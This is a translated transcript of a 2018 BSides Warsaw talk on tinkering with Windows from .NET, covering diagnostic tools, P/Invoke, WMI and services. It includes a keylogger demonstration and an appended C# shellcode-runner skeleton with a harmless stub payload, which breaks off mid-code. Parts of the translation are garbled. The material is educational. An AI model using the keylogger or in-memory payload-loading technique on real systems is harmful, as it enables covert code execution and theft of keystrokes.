Taniec Z Całym Ciałem W Gipsie

BSides Warsaw · 2018 · 1:01:11 · 1.6K views · Published 2018-10

Transcript [en]

Hello everyone! If anyone has survived this far, it's the Polish Championship. Which one did you play yesterday? The North? Why so fast? Bravo for Mac, who is still running the party. Oh, I switched it on. Since October is the month of security, we will talk about security. One of the tools that let us assess this security is risk assessment. I have simply followed the Polish standard PN-N-18002:2011. So, what does it look like? It is the simplest of methods when it comes to risk assessment, because we only have two criteria: the probability of a certain threat and the severity of the consequences. If the probability is small, then the risk is small. The same with small and medium. If we get small here, it means that we can take the action without any worries. In the case of medium, it would be worth thinking about how to reduce this risk, while in the case of large, it's best not to take this action at all. This introduction had nothing to do with this presentation. Okay.

Here, at the beginning, I asked: "Do you know my wife?" and my colleague answered correctly: "I suspect that if someone rides a boat, it very often responds to 'it will be dark soon'." Exactly. It also comes from this company, from this "rrr". If someone hasn't watched it, I encourage you, and the best is the dubbing with Adam and Eve.

My topic is "Dancing with your whole body in plaster", which is hacking from the .NET level. So first of all, a few words about myself. I am an IT student at UZ. Greetings to my lecturers who are watching now; maybe they are not watching, they should be at classes and I am not. Besides, I have a diploma in occupational health and safety. I also have a BHP technician's certificate, but I did that earlier, I'm a piece of shit. I'm also a software developer at Gemotial. I used to be involved in Security BSides in Poland, then I decided to get sick, but my doctor told me in September that I'm not sick anymore, so maybe I'll come back to it in the future. Maybe we'll take care of Wrocław, apart from Warsaw, if they're willing. Why not? Please? No problem.

Besides that, I'm crazy about IRC channels. You can find me on the "Lon" channel. It's a channel I started a month after I started using the Internet. Generally, when I got a computer at home, I decided to check in one old book whether there is still something like IRC. It turned out that there is. And it will never die. So I have this channel; in a month it will be 10 years old, and I am very proud of it. Besides, I breed ants. No, seriously, I'm not kidding about the ants. This is our formicarium. One day my fiancé simply brought ants. I fell in love with these ants. Here we have a leech and here we have a few representatives of the Lasius niger species. An interesting fact: they nest here, and to make it dark for them, there is a box on the router. Maybe that's where this "packet loss" came from.

Let's start with the title. "Dance". To be honest, I can't dance. Let's start with the dance. I remember once I found a document by Eric S. Raymond, "How to Become a Hacker". Generally, it's the document where they write that hackers should practice Hatha Yoga, play an instrument and write in Python. And there was something like: yes, there are operating systems in this world other than Unix, but they are available only in binary form.

You can't read the code, you can't change it. Trying to learn how to hack Windows or macOS is like learning to dance with your whole body in plaster. So this man was my motivation, and as you know, the creator of the Jargon File can't be wrong. I can't dance, and when it comes to security, I only do BHP. And security is the only thing that connects me to my IRC friends.

But let's go back to analysing the quote. The main problem is that the man said that closed-source systems, systems that are available without source code, have two main problems. The first one is the lack of any possibility of reading the code and of modifying the code. To be honest, I haven't seen any third understanding here. So, if it wasn't for... You're stuttering when I'm stuttering, right? For people, such volunteers, it is enough that they can look at this code, that they can read it. But the truth is that if they want to, they can do it anyway. We have binaries, so they can look at it this way, and if they have a little more money, even this way.

And now a question for you. Here I have a pyramid. Who of you has ever read an interesting fragment of code? Okay. And who of you has ever read an entire code module? Who in the last month? Oh, there are still some. And who from the currently used release? The gentlemen there probably do nothing but read code. And from the last push? So now I have a question: who has recently read a whole library? Any programming library? These two gentlemen. And who has read all the programs that are installed, in their latest versions? No exaggeration, right? And here this man says that someone should read the whole operating system, because if we read only a piece, it gives us nothing. And soon there will be a situation where we are still at the level of the code, and what is behind this code. I'll give myself a break. And who of you has recently read a fiction or technical book? Hands up. They count too. Some prefer to read.

And listen, from this small survey I came to the conclusion that hackers prefer to read a fiction book rather than the complete source code of every library version they use, not to mention the operating system. We have a living example of this here. And I'm not saying that these modifications don't happen; some people modify the code, but you can modify both the code directly and the code that is already compiled. And when it comes to reading everything, you know, creative minds are a valuable, rare raw material. They should not be wasted on repeatedly indenting code. There are so many other problems waiting for a solution. The problem is that if we read the code all the time, we will run out of time to create it. Currently there is so much open-source code that we have no time to think about it. Not to mention that we use source code all the time which is delivered by third parties and we simply add it as a DLL. If someone wanted to read everything, to be able to vouch for it, I wouldn't let him vouch even for his own code, for what he generates when it comes to packages, etc. If we take the fact that these people are looking and seeing, it's like an accident scene. I took a gawker from a demotivator. A gawker at the place of an accident is no help; they are just looking for sensations. The same is the case with errors in programming. Sometimes people, looking at it, even if they find something, they say nothing. For example, because they are in the service, or they need a zero-day in the future, or they don't want to cause people problems. Or even worse, they will go to the media and do some crazy stuff like "hey, you know what, these are the ones who have a hole". Aha, I was not supposed to use the word "hole".

To modify the operating system we don't need the source code. What I've shown here are just a few examples of how to influence the operating system without modifying its source. In Windows, for example, libraries, especially libraries that are sitting in some corner, are a modification of system frameworks. In C#, I recommend using SharpShell. We have all kinds of system services. We have the writing of drivers. If we are in drivers and we write something that communicates directly with the driver, we work in kernel mode to the extent that if we don't get an exception from there, we unfortunately get a blue screen. Besides, there is WMI, which someone will come up with at some point; we will play with it a bit. We have the system registry, where we can also mix something up. We have all kinds of wrappers and the possibility of writing them. We can always play debugger. An example of people who play with the system is Sysinternals and their tools. They just talk with WinAPI literally in its language.

Let's talk about safety. We've learned about dancing, now let's talk about safety. I took a dictionary of the Polish language and it says: "Safety is a state of lack of threat". But when I wanted to see what a threat is, they told me it's a lack of safety or a lack of a sense of safety. To understand recursion, we need to understand recursion first. In the Anglo-Saxon world, security is divided into safety and security. So here it is more a sense of security, and here it is more protection against danger. We don't distinguish it. When it comes to people from security, the first thing that comes to mind is us, BHP workers; I am a BHP worker by profession, besides being a developer. So these are people who go around with all these risk assessments, characteristic cards or checklists and check that no one is doing anything rude. And besides, they also hand out some protective equipment and scare people at trainings that they will hurt themselves. Thank God the watch is intact, because without a watch I'm like without a hand.

But there are also other people from security. And these are the "gentlemen". We have this guard here and this one here. This man is armed, you know, some gatekeeper, you know, when he brings cash to the bank; these are also such gentlemen, armed to the teeth, afraid of being afraid. These are our security, and this is the man who takes care of giving access to these resources. So it would be more like an admin in our environment. Mr. Pechat. And we also have such an e-protector. So that's you. These are people who are simply securing things in a slightly different way. Their monitoring is mainly logs and so on. You don't have visual monitoring. And your telescopic baton is some firewall and cutting off traffic. Generally, you are the ones who try to prevent these threats, but they are more "E". So, "E" security, you can say, to separate it from those security people, that is, the ones with "security" on their jackets. There is also "E" dad. Mr. Dad. This is the kind of person who... There is a security specialist here, so he probably knows more about it. Congratulations to the president. As for these gentlemen, they are gentlemen who go to fairs, so you can say a bit of red teaming. If they catch some unpleasant situations, they call other services or inform the person responsible for it. We also have such a "cow", or you can say "a cow". So it's a so-called nightstand. It's a worker who sits somewhere, shut up at night in a server room, and knows that when these or those lights light up or when he sees red logs, he should call the specialist quickly.

Another "who is" is a security guard. Maybe not so much "who" as "what". Because this is a fuse. It is an electrical device that protects the whole electrical network from outages. It burns so that everything around it does not burn. I will go a step further and show you what a dangerous wire is. It is a dangerous wire. When we throw in a nail and entrust safety to a tube or other wire, you change the safety wire into a dangerous wire. The current flows, everything is great, but... You can lead to tragedy. This network will be overloaded and will catch fire. No CloudFarm will help anymore. So my message is this: do not replace this fuse on your own. Unless you are electricians and you know what you are doing.

Another thought: you have the object unprotected. Okay. Since you know each other better in security, and I may touch you a little, I will tell you. So touch, touch, what the fuck, right? You know what, when I started to deal with it, it was a competition for Java on the one hand, and on the other hand, it was a place that, you know... First of all, we choose Linux, because nobody uses Linux, and when you start to move in such an interesting environment, you start to choose Windows to differentiate yourself from the others on the other side. It was the same with me. Times change, hell freezes over, and if you've tried to be an anarchist against freedom and choose Microsoft, it turns out that Microsoft can be freer than the free ones. So here we have .NET Core. And listen, when Java starts to be paid for soon, it may turn out that soon you will all be writing in .NET Core under Linux, using Azure and so on. We have everything on docs.microsoft.com or the old MSDN. I will show you some screenshots from there later. It's probably better documentation than man. Besides, we have our own "dirt" in the dotnet environment. It looks like this. I don't know if you were at Paweł Łukasik's presentation about Radar a year ago. This was a man who used to deal with .NET and he came up with this portal. Now Piotr Stap has taken it over, because generally this year everyone takes over something.

If we look at .NET, we have IL there. And our main ASM is IL. IL is interpreted into ASM, by the way. Unless someone just compiles it into something else with NGen. You can interpret it through the CLR or some alternative environment. In the case of C#, we have memory management through the CLR. And we have memory management when we want to. When we don't want it, we don't have it, because we can just paste half of the code in an unsafe section and everything will be OK. Generally speaking, when I was at university and I was doing "propaganda presentations" because I was in the UZ.NET student science circle, I told the students that .NET as a platform is safe, fast and multilingual. And imagine that I managed to find some confirmation for everything. As for security, I once found a Kaspersky report that suited me politically. I don't remember which year it was, I just made a screenshot of the website. And of course I noted that Java is bad and not good, and the first two are yellow, so the biggest holes and the most of them are from them. Then there is Flash Player, what else do we have? Adobe, Apple, iTunes, and other such things. And it turns out that there is no .NET here. And only after years, a certain person said to me: "Do you know why there is no .NET in such reports? Because nobody has simply checked it." So sometimes it turns out that it is better to choose something that nobody cares about, and then it is safer. That's why I had a Windows Phone for some time, until it got flooded, and now I'm on Apple. And I'm already catching up with these statistics, unfortunately.

As for speed, fortunately, we are faster than Java. I will try to click on it. Of course, it opened three times and it is not on the screen yet. Here we can read how a specific platform dealt with specific problems. Let's compare with C++, it won't be so beautiful. Okay, this failure is not so bad. Let's go back to Java. It is very often the case that memory is weaker. Maybe not in this example. But when it comes to CPU, it beats a lot of platforms. Why? Mainly because they want to save money on Azure. Okay, I'll switch it on. Okay, I'll click. When it comes to multilingualism, the main languages in .NET are C++, C#, Visual Basic for .NET, and F# if you prefer more functional languages. But suddenly it turns out that there are a lot of them, and it's just a part of the screen. And if someone wouldn't have enough of that, they can always implement their own language, because the entire platform, when it comes to the runtime environment, is standardized. CLI, the Common Language Infrastructure, is a description that describes how our language must behave after compilation to be properly interpreted by the .NET platform, simply standardized by ECMA-335 or ISO/IEC 23271. In addition, everyone can run their own environment on their own compiler and there are no patents for it.

Okay, I see that everyone is already asleep, so I will not talk about dotnet anymore. If someone would be interested in it anyway, I can suggest three books. The first one is this one: CLR via C#. It's a great book for the .NET environment. If you want to have fun, and not necessarily politely, this is something that you have on your desk, under a pillow, etc. The second book hasn't been published yet, it's still in pre-order, but because Konrad Kokosa wrote it, he couldn't screw it up, it's simply impossible. Because this man has so much knowledge about it, it's just a small head. In addition, the lady who wrote the Microsoft Garbage Collector was a reviewer of this book, and this review was also very positive. Something else was created; I put this book in only because it exists, because there are very few of them in this range. I was so excited, I even had to do some of the things from this book, but it turned out that most of it shows how specific APIs are generated and how to send an HTTP request and get a response. The only thing that was different was the links. If we have enough time, maybe I'll show you a little.

Okay, let's move on to hacking. In my opinion, hacking is more a modification of something that already exists, that we already have. We will write some kind of wrapper for some system command, I will show you how to do it. We will set something in our system from the level of our own code, something more to play with in the system. We will use system frameworks, we will write our own system service, and at the end we will maybe start something ugly, as long as there is enough time.

Now it's time for the meat. Let's say that if Visual Studio won't answer, I'll try to answer the questions from the room. I've set everything up earlier, but knowing life, you know how it is. It worked yesterday, but you know what? The fact that something worked yesterday... I already know this platform enough that I just don't trust it. No, you know what? .NET is very stable, but when it comes to Visual Studio, it's all fused. I didn't have to add any more; I managed to turn it off half of the time, but when I started turning it on, it turned out that the project didn't start, and I didn't want to add anything to it, so I turned it on again. Which ones? We'll see. Cool, we'll see. I mean, I don't remember when I even started the code ending. Cool, then we'll sit down later and try to add it to make it work.

Okay, when it comes to the Windows system, some people know something like DLL hell. We put a library in the wrong place and it loads. If we want to prevent this, and we are developers, or we have the Windows SDK or Visual Studio, we can use the gacutil tool and just put this DLL in there. Then we are sure that it will take it from this place in the first place. Where are they stored? C:\Windows\Microsoft.NET\assembly\GAC_MSIL. I'll try to show you a demo now. I'll start with... no, not the command prompt. This one is cool. OK, you can see something here. OK. Now there is "fus", like fuzzing. "Log", like log. And "vw", like Volkswagen Golf (fuslogvw). OK. This window, of course, showed up here, not here. I have them here, I'll give it delete. Okay. Is there a delete all? There is a delete all. Refresh. Okay, I'll try to start this tracert, which my friend was talking about. Maybe not a broadcaster, because I'm looking for a tracert. Okay, start. I'll discuss this tool a little later, but what I want to show you for now... Aha, of course, I look at the window and it showed up wrong here. Was there something about pinging WP? Okay, run.

Will it work? No, it didn't. It's working. It's enough that it's loaded. I'll close this window. And now refresh. And here we can see what DLLs have been loaded and where. Okay, am I recognizing something? Okay, let's open something from the outside first. You can see what's here. I hope there won't be any problem. We have information about the loading operation. We have the locations where the DLL was loaded from, with what parameters, with what locations and all the general information. Here we have that an assembly was found by searching the GAC. But if we take another one, the one that I know is not in the GAC yet, I've already loaded it. Something of my own, for example this one. This assembly was loaded directly from this location. This is the location where I have this project. I've compiled it in Release, so it's in the Release folder. It loaded with this config, because sometimes it turns out that these configs are in different places depending on where the application is, and people will pull the wrong config. So here we can verify it. We can also see what it loads and so on. Now I can try to load this library and start it from the disk. How much will it allow me to do? Or I'll give it a rest, because I have a problem with navigation. Okay, slide display. Another thing we can check is what DLLs are loaded. This is AsmSpy. I'll also try to start it. I have a shortcut prepared somewhere here. Okay.

CD, here is the location. And now we have... the directory name is wrong, because it is not the directory name. And now we can go with this asmspy and give it some binary as the parameter. For example, I don't know if you will see it now, I will copy it as a path. Well, no exaggeration, man. And here we also have part of this information. Our binary refers only to WinAPI in this case. Okay, that's it when it comes to DLLs. So if you're looking for the place where something is loading from and you're not sure if it's this one, it's worth checking it out here. If this cool tool didn't work for you, there are two possibilities. Either logging is not enabled in the settings, or you need to set up specific things in the registry. Here I prepared a bit of PowerShell that will set it all up in the registry. And the next thing is that the fusion log path folder must exist, otherwise it won't run, so mkdir fusionlog should work. Okay, I'll try to go back to the presentation. Okay, that was the fusion log.

Another interesting tool that will help us in analysis is Tune. Has anyone heard of Tune? It's a very cool tool. I'll go back. It's Konrad Kokosa's tool. It looks something like this. What we have here is a piece of code and we can see it in IL and in ASM. So we have a piece of code and we check how it will be translated into ASM. I had the previous version here, but it turned out that an update was created while I was working. So I decided to download it too. And listen, I tried to start it and bang. "Not for you" exception, as I say. So, you know, when a blonde doesn't read how to use a tool and tries to use it. Guess what I did wrong. Okay, maybe the first question: has anyone ever used Tune? Okay, no one. So, what I did was I tried to load a C# file instead of an XML file, which looks more or less like this. So here we have some header and parameters and we just paste the source code here, right? So, yikes, it worked later.

I'll try to turn this Tune on. It will be a bit "Mexican" because it opens in such a way that I can't see half of the window. I was wondering at some point if I should report it. Maybe if I switch to that screen, it will be visible, because I can see a piece of the screen here. Okay, so here it was Shift and right-click to get "Move", and arrows here, and only now I can move it somewhere here. OK, it's also cut off, but it's weird by default and you can't resize it, but in this later version it seems to be possible. OK, I have a resize. So what I'm doing now to make it easier for myself, I'm opening any sample so that it doesn't fall over when opening. Then I'm looking for any, maybe locally here, so as not to disturb any Plexi Sharp. Well, at least this one, open Visual Studio Code this time, so as not to cut. OK. Ok, the simplest one, what could it be? Where am I? Show me what you have inside. And here you can choose a platform and debug or release. First I'll start it in debug. Ok, something is going on. Skip compilation. Will you pass, ma'am, or not? Invoke method. This argument is not working, so it will break, never mind. The only thing I wanted to see was the IL. So here we have what the IL code looks like. We have here the function we declared. We have here the local variables of this program that were created. And a dance. Here we have it in the ASM version. It's a pity that the old version had line numbering, but it's not here anymore. So I'll try to copy this ASM to VS Code. Okay, I have it in debug. And I'll try to run the same thing in release. Run. Log. You're going. Of course, run will fail, but that's not what I mean. OK, running ending true. We have a new one. I'm copying it here just to show you the number of lines for this piece. In the case of debug, we have 57 with empty lines, but it ends somewhere at 55, and here 44. Notice that there are fewer lines, so you can analyze how your code is optimized with the default flags. Of course, later it will be possible to modify it; it is available as source code, so there is no problem. Here, what we can do is edit the code directly here. How do we change it? We click "Run", it will analyze this code again. I recommend this tool to anyone who wants to analyze or optimize their code based on the binaries that are produced.

Another tool is ILSpy. You probably used ILSpy, right? No? Is there a dotnet developer in the room? Okay. Let's load ILSpy. Where is it? Okay, I have to go to the desktop again. There is a magic folder with shortcuts. Presentation, shortcuts, ILSpy. Ok, now there is a lottery. Where will it appear? Where is my mouse? Ok, I can see it. Ok, I will load this CHK_Dump, which I will use later. And, oh, here it is. When we have a binary, we are able to load it and see it both in IL and in C#, and in a mix of the two. And it often happens that it's totally 1:1 what we wrote. Okay, maybe I'll run some more. Intracert, bin, debug, Intracert.exe. Unfortunately, I see more than you. So here we can see what we created. We have, for example, a hop list.

We can see what methods we created, what variables we used. Besides, we have information about things that were linked. I will also try to expand the types that were used by our application. Variables, properties, and also the code itself. Methods, if I manage to get a method from here. MainWindow. And, for example, we have some variable declarations here. InitializeComponent, which is called from the outside. But here we have an example of the OnChecked method, which in the case of IPv6 turns off the -4 parameter, so you cannot simultaneously force IPv4 and IPv6, and the -j parameter, i.e. the list of hops through which it passes, is also set to false, because this feature is only available for IPv4. So I can, without having access to the source code, load the DLL or the EXE and see what's inside. Here's one of the system ones, so we can load the system ones, we can load the GAC and analyze our code 1:1 this way. Unless someone was rude and obfuscated it, but we don't have any bad people around, right? I think so too. So, that's it when it comes to ILSpy.

When it comes to CMD wrappers, I've just shown you my tracert, for which I've put the code on GitHub before. I'll just switch to the second screen to change the project. We have the main window of the application. What do we have here? We create a model that we bind to the view later. And what do we do next? I have a separate DLL that does the magic. Here I have a wrapper for CMD. If text comes from the output, it is added to a specific text field. It also informs us about the exit, so that we can press run again, and we throw an error code. We have a function runCMDProcess. Here we have a simple process start, in this case a little asynchronous. I've wrapped the basic events to be able to talk about it. And in fact, this way, through ProcessStartInfo and Process.Start, we are able to run any system-level command in the case of CMD.

If we have a text layer here, what about a graphic layer? Let's move on to something like this. I create a simple program as a class library. I sign the assembly so that my system trusts it. I make such a command and I can do additional things. Now, this was the MyExt project. The new Visual Studio instance is loading. How long is it? 38 minutes. Okay, I'll make it. I'll be a body. Loading solution project. Maybe right there, because it's small. I'm at the stage where I can't move the window because I've moved to Visual Studio. So, is there any question? Because I promised that if it closes, then... Okay. Okay, so... I'll wait. Yeah, I have it. I have a question, because the computer is not working, so I just want to say. It's lagging because my computer doesn't cope with the fact that there are three Visual Studio instances plus Office and hell knows what else. Open folder in File Explorer, because I will need it in a moment. What do we have here? Notice that we have a very, very simple thing. First we have a function. In this case, I just chose to add something to the menu. In the first step, we check whether the menu can be shown. Then we create this menu and when we click on this menu, we call... What does this function do? It goes into the directory, then it collects all the files from it and moves them to the directory above. If after this operation this folder is empty, it just removes it. The trick was that if you unpacked some zips, it very often created an extra directory, which was not needed, so at some point I just used it. To avoid getting stuck in the command line again, I downloaded an application called Server Manager. I will link it later. I will load this extractor. I have it. It will allow me to install and register this particular extractor that I have built. So we have install and register for 64. And now, I will have to... I don't know, maybe I'll take this window. Okay, are the properties large? Okay, there is one file here. Okay, I'll copy it. And now, if... Here I have a new command, extract. As you can see, there is no Properties copy, and this file appeared here directly. AssemblyInfo.cs, because it was a copy of this Properties, so we had exactly the same AssemblyInfo.cs. The next thing I will do is go back to this application. I will click on it and uninstall it. So server unregister, server uninstall. And now when I try to do the same thing, notice that my tool is not here anymore. So it was live. I'll finish it now. Bye bye, I don't need you now. Demo doesn't work.

I'll remove this shortcut from here and move on. If we want to create our own native code, we have to export it. So if we create it, we need to remember to write __declspec(dllexport) int __cdecl, so that we can run this function from C++. I put extern "C" here because I didn't want this name to be decorated in any way. Another thing to do: we can use our solution as a dynamic library and compile it as a DLL. We use it directly in this way: DllImport, here in the string we have the file, so we give it, and we also give the calling convention. In this case we took CDECL, so it must be here. If we put this private static extern int here, then we can later call this function in our already managed function and it will be fine.

But to be honest, it's not enough. Another thing we have when it comes to P/Invoke is that we can write a hello world. When I bought this book, I thought that something was wrong with it, so it will be this piece of code, so it is from Gray Hat C#. What was done here is that it was able to detect the operating system in .NET. In the case of Windows, the message box runs; in the case of Linux, the print runs, due to the fact that it was able to DllImport from libc. I honestly couldn't do it under Windows.

Okay. As for the P/Invoke mechanism, let's do something more interesting. I will show you a piece of my favorite project with P/Invoke. We have a system time here. The first thing we do is take some time and set it. If it is set, we let it be set. If it is not set, it is difficult. It is known that it requires administrative rights. Refresh OS time, how does it look? F12. What kind of magic is going on here? First, we check if this server exists, we download it via NTP, then we set the system time through a helper, which was downloaded by this NTP. What we have here, and it's interesting when it comes to this part, is that if we have this system time, we need to remember that it is LayoutKind.Sequential, because it often happens that these structures must be packed in memory one by one, because otherwise the functions we have from WinAPI can misinterpret it. This code is also available on GitLab, under this link.
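Worked example, added by the editor and not taken from the talk or its GitLab project: the two P/Invoke cases described above in one console program. The first is a DllImport into a hypothetical native DLL (nativedemo.dll exporting Add, assumed for illustration; its C++ side would be extern "C" __declspec(dllexport) int __cdecl Add(int, int)) with the Cdecl calling convention stated explicitly. The second is GetSystemTime/SetSystemTime from kernel32 with a SYSTEMTIME laid out sequentially to match the native struct, plus the error check for the missing privilege the speaker mentions (ERROR_PRIVILEGE_NOT_HELD, 1314, when not running elevated).

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

// Added example (not from the talk). Demonstrates the two P/Invoke cases discussed:
// (1) calling our own exported native function with the cdecl convention, and
// (2) calling kernel32 with a struct that must be laid out exactly like native SYSTEMTIME.

// Mirrors the native SYSTEMTIME member order; LayoutKind.Sequential keeps the fields in
// declaration order instead of letting the CLR reorder them for its own convenience.
[StructLayout(LayoutKind.Sequential)]
public struct SYSTEMTIME
{
    public ushort wYear;
    public ushort wMonth;
    public ushort wDayOfWeek;
    public ushort wDay;
    public ushort wHour;
    public ushort wMinute;
    public ushort wSecond;
    public ushort wMilliseconds;
}

static class NativeMethods
{
    // Hypothetical DLL (assumed to exist next to the exe) built from C++ as:
    //   extern "C" __declspec(dllexport) int __cdecl Add(int a, int b) { return a + b; }
    // extern "C" stops C++ name decoration, so the export is literally "Add"; the DllImport
    // must say Cdecl because DllImport's default convention is Winapi (stdcall on Windows).
    [DllImport("nativedemo.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int Add(int a, int b);

    // kernel32 functions are WINAPI (stdcall), which matches DllImport's default.
    [DllImport("kernel32.dll")]
    public static extern void GetSystemTime(out SYSTEMTIME lpSystemTime);

    // SetLastError = true makes the marshaller capture GetLastError() right after the call,
    // so Marshal.GetLastWin32Error() below is meaningful.
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool SetSystemTime(ref SYSTEMTIME lpSystemTime);
}

class Program
{
    const int ERROR_PRIVILEGE_NOT_HELD = 1314; // SeSystemtimePrivilege missing: not elevated

    // Returns true when the clock could be written, false (with a reason) when it could not.
    static bool TryWriteClock(out string detail)
    {
        NativeMethods.GetSystemTime(out SYSTEMTIME now);
        // Writing back the value just read is a harmless way to prove we hold the privilege.
        if (NativeMethods.SetSystemTime(ref now))
        {
            detail = "clock written (running elevated)";
            return true;
        }
        int err = Marshal.GetLastWin32Error();
        detail = err == ERROR_PRIVILEGE_NOT_HELD
            ? "SetSystemTime refused: run elevated (SeSystemtimePrivilege needed)"
            : "SetSystemTime failed: " + new Win32Exception(err).Message;
        return false;
    }

    static void Main()
    {
        NativeMethods.GetSystemTime(out SYSTEMTIME utc);
        Console.WriteLine($"UTC now: {utc.wYear}-{utc.wMonth:D2}-{utc.wDay:D2} " +
                          $"{utc.wHour:D2}:{utc.wMinute:D2}:{utc.wSecond:D2}");

        bool ok = TryWriteClock(out string detail);
        Console.WriteLine((ok ? "OK: " : "Not set: ") + detail);

        try
        {
            Console.WriteLine("Add(2, 3) = " + NativeMethods.Add(2, 3));
        }
        catch (DllNotFoundException)
        {
            // Raised lazily on the first call, not at startup: the DLL must be beside the exe or on PATH.
            Console.WriteLine("nativedemo.dll not found next to the executable");
        }
        catch (EntryPointNotFoundException)
        {
            // Typical symptom of a missing extern "C": the export carries a decorated C++ name.
            Console.WriteLine("export 'Add' not found (decorated name? check dumpbin /exports)");
        }
    }
}
```

Run it twice, once from a normal prompt and once elevated, to see both branches of TryWriteClock; the Add call shows the two failure modes a wrong export or a missing DLL produce, which surface only when the function is first called.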

Another interesting thing I want to show you is the simplest keylogger. It turns out that if something is available in WinAPI and it is Microsoft's, they don't care what it is. So I decided to check if the simplest keylogger in the world works without any antivirus. And surprisingly, it works. CHK_Dump, that's what I called it. What I did here is I just plugged in the keyboard hook and just dumped everything into the file, literally character after character, because I don't know when I'll be able to stop it, and I still want this file to be readable, so that there is no garbage in there. So I just open the stream for every character. I'll try to start it. As you can see, it's not working, or at least it didn't work yesterday. OK. Now if I write something... Ctrl, Notepad... Where is my mouse? Notepad is not open where it should be. OK, that's enough. Now I have a good situation. I will stop this process at this moment. It's good that it disappeared here, but fortunately I have Stop Debugging. Otherwise I would have been looking for it everywhere. OK. Now I will try to enter... the place where the binary is... no, not obj, for God's sake, bin. It went to Release, so here. And in this text file... I have something like this. Here I have this "dog entered the kitchen". I have special characters here, because I didn't add them, because it's simple code from WinAPI. But notice that there is no "he stole a quarter of meat" anymore, right? What happened after the stop? Nothing was called. Nothing. I was surprised, I thought I would be hit in the back, but not yet. I decided to go a little further. I took this function directly from SetWindowsHookEx, the function, etc. It turned out that everything was beautifully described on the Microsoft documentation pages. I didn't have to think about anything.

I see that I have 4 minutes left, so I will try to be as quick as possible. The system registry. You can easily query it in this way. I will not show it because I have 4 minutes left, so I have to be very precise. I will show you something more interesting. As for WMI, I wrote something about WMI, but unfortunately I got the information that something went wrong. It often happens that we run something in WMI, we have our code, but this code works only for a specific operating system and nothing else, because something has changed. Besides, it may turn out that we have different applications and it doesn't work. So it is a very good thing to check for yourself, using WMI Explorer, whether we still have the possibility... I'll give it a connect here. Do we have the possibility to use this particular query? Most of the time I always take it from here, and we can ask a lot of things here. And then, once we've got it, once we've chosen a specific thing, we get something like WMI Code Creator, we choose a specific thing, and here we have code that we can directly paste. In this case we have a VBScript, but we can quickly change it to C# code. Copy, paste and it works. And suddenly it turns out that all these super cool system tools that were added to the computer world in one format or another were generated in this way. I had more demos on this topic, but I really don't have much time left. I have two minutes.

I want to show you something dangerous. You can still do something with it. So, without further ado, I decided to use it to create my own system service. Here I am downloading information about disks. And then I will do the system service, which will benefit from this data. So I create a system service. Remember to set the system service installer to LocalSystem. You will have more possibilities. By default, you do not have a startup project set here, so it cannot be launched. In my case, it is a file broadcaster program. The installation method... I would show you the installation, but unfortunately we don't have much time: InstallUtil.exe, and here we have our exe, which we gave there as the startup project. And here's another fun fact. This window comes from something like the Developer Command Prompt for Visual Studio. So very often, in order not to deal with system settings, in order not to deal with your environment settings, its environment variables, etc., here you have an additional command prompt, which will be linked to all the things related to Visual Studio, which are related to strictly .NET things as well. Earlier I showed that after I called this command, it appeared on the list. It started to spit out some logs, and then I uninstalled it and it was gone. I can also show that, in fact... I don't know, some disk, a small one. Okay. Okay, the system warns me that the write has actually been copied here. You can run it, everything is on GitHub, just ask in case of problems.

Okay, and I decided that I will show something ugly at the end, so I will give it a payload. I downloaded such a very ugly tool for M and generated such an exploit. And then I tried to use it in my application. I decided to take this payload, copy it, lock the memory and then run it. And it turned out that after compiling I had... Seriously? Are you fucking kidding me? Yes?
- If the generator is a protocol, it always works.
- I think so.
- Yes.
I wanted to know if the payload was created by itself in some way. I would lose my sanity in hacking, so I don't want to add it. At least for now. So that's how it looks. I've added a command here. And here, when we expand it, it's just a raw hex value, written from this payload. If someone really wants to go one step further, there is such a place directly on GitHub. You can go deeper, read, etc. I had plans to communicate with all these frameworks for the Secs, but I didn't have time. I thought it was boring, because most of it was just calling some web API. If you are bored of using Windows, .NET, etc., you can install Kali in Windows.

To sum up, because I'm running out of time: we managed to talk about .NET, we looked at how IL and ASM look, we didn't bother about WMI because there was no time, some service was turned off, we've wrapped some CMD, we fed our cat with vitamins and we know where to look for information. Since I'm two minutes late, there will probably be no more questions. Thank you very much. Here you have my contact details. I don't know if you can see them. In case of anything, I should still be here for half an hour. The cat is here, but from what I see, the colleague who stalked me was already able to handle it. And I give the floor to the president. Thank you very much.

Okay, Piontkosia, so for you, your first SBA diploma as a pro-legend. A notebook, a pen, the first one to get, not to take. And stickers, also to get, not to take. I got the first one at the registration, what's the first one about? But as a pro-legend. Okay, so now we need literally... Can I say one more thing? Sure. It was said earlier that my predecessor was the first "Zapchaj Dziura". No, he wasn't the first "Zapchaj Dziura". The first "Zapchaj Dziura" in 2013 was Borys Łącki, so bravo to Borys! And you know what? He was such a "Zapchaj Dziura" that he appeared every year officially. So, big bravo to him, it was a really great purchase.
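Worked example, added by the editor and not the speaker's code, for the last demo of the talk ("take this payload, copy it, lock the memory and then run it"): the sequence as it is usually done from C#, with VirtualAlloc, Marshal.Copy, VirtualProtect, CreateThread and WaitForSingleObject, all standard kernel32 calls. The payload is a constructed one-byte stand-in (a single ret instruction, 0xC3, valid on both x86 and x64) so the thread starts in the buffer and returns at once; no generated payload is included. The memory is allocated writable and only then flipped to executable, rather than requested as RWX in one step, which is the variant most often flagged.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

// Added example (not the talk's code). Runs a byte array as native code from C#:
// allocate, copy, make executable, start a thread at it, wait for it, free it.
class PayloadRunner
{
    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint MEM_RELEASE = 0x8000;
    const uint PAGE_READWRITE = 0x04;
    const uint PAGE_EXECUTE_READ = 0x20;
    const uint INFINITE = 0xFFFFFFFF;

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress,
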